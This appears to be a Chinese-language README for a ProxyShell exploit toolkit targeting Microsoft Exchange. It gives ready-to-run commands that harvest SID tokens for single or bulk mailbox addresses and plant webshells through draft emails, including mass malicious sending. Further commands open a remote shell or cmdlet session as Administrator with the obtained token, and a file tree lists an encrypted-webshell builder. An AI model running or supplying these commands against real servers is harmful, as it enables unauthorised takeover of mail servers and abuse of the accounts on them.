对Exchange Proxyshell 做了二次修改,精确的拆分、实现辅助性安全测试。- python send_webshell_mail.py https://mail16.echod.com aaa@echod.com 单个获取
- python send_webshell_mail.py https://mail16.echod.com crack 批量从mail.txt 读取邮件,进行尝试获取SID token
- python send_webshell_mail.py https://mail16.echod.com aaa@echod.com send (只发送webshell 草稿邮件)
- python send_webshell_mail.py https://mail16.echod.com crack send 批量发恶意邮件 (不建议这么做)
- python wsman_shell.py https://mail.echod.com Administrator@echod.com [这里替换获取到的token] 这里只进入cmdlet 执行命令
###### 发送邮件后可以直接使用 这个命令即可尝试getshell,具体Path可在脚本路径里调
- python wsman_shell.py https://mail.echod.com Administrator@echod.com [这里替换获取到的token] shell
##### Test Send mail

##### Test shell Response eeeee

##### Crypt_webshell

[4.0K] /data/pocs/a16a4801be9b26a71fe94c7f65d58ed53c65e31e
├── [ 63K] Crypt_shellcontent.png
├── [4.0K] Crypt_webshell
│ ├── [ 91] conver_baser64.py
│ ├── [ 10K] Exchange_Cryptshell.exe
│ ├── [ 157] readme.txt
│ └── [ 123] shell.txt
├── [401K] getshell.png
├── [ 40] mail.txt
├── [1.2K] README.md
├── [ 75K] send_mail.png
├── [6.6K] send_webshell_mail.py
├── [1.2K] sid.py
└── [5.6K] wsman_shell.py
1 directory, 12 files